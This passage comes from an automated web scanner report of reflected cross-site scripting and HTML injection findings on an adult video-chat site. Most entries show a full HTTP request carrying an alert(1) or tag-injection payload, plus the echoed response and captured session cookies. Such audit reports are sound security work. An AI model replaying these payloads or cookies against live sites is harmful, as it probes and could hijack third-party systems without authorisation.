GET /celebrity-porn-stars/celebrity-events/?db582'-alert(1)-'4b3c1d175fb=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:59 GMT Connection: close Content-Length: 2667 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> War ...[SNIP]... <script type="text/javascript"> function IAgree(){document.location.href='?meAgree=yes&redirect=%2fcelebrity-porn-stars%2fcelebrity-events%2f%3fdb582'-alert(1)-'4b3c1d175fb%3d1'; return false;} function IDontAgree() { window.parent.location.href = "/"; return false; } </script> ...[SNIP]...
4.490. http://imlive.com/disclaimer.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/disclaimer.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd26f'><a>d83acef05af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /disclaimer.asp?cd26f'><a>d83acef05af=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:16 GMT Connection: close Content-Length: 78891 Vary: Accept-Encoding
<html> <head> <title>Disclaimer - Live Video Chat at ImLive</title>
<link rel="stylesheet" typ ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp?cd26f'><a>d83acef05af=1&lr=1107816009&ud=0&pe=disclaimer.asp&qs=cd26f'> ...[SNIP]...
4.491. http://imlive.com/forgot.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/forgot.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e80f3'-alert(1)-'c0da0968686 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forgot.aspx?e80f3'-alert(1)-'c0da0968686=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:43 GMT Connection: close Content-Length: 3338 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Imlive.com Customer Serv ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx?e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
4.492. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/homepagems3.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e62a5"><a>8b3d580d15c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /homepagems3.asp?e62a5"><a>8b3d580d15c=1 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
4.493. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/homepagems3.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ef1f'><a>f607da23703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /homepagems3.asp?6ef1f'><a>f607da23703=1 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
4.494. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d227'-alert(1)-'63744927c3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/?6d227'-alert(1)-'63744927c3a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:01 GMT Connection: close Content-Length: 40531 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/?6d227'-alert(1)-'63744927c3a=1&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEve ...[SNIP]...
4.495. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ff1"><a>7cdd9e5718 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/?66ff1"><a>7cdd9e5718=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:44 GMT Connection: close Content-Length: 40363 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/?66ff1"><a>7cdd9e5718=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.496. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/adult-shows/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52a1f'-alert(1)-'124e919064e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:40 GMT Connection: close Content-Length: 25778 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.497. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/adult-shows/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb3b0"><a>47d9b6a6eb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:35 GMT Connection: close Content-Length: 25631 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.498. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/cam-girls/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d13a5'-alert(1)-'167550feeda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:10 GMT Connection: close Content-Length: 225335 Vary: Accept-Encoding
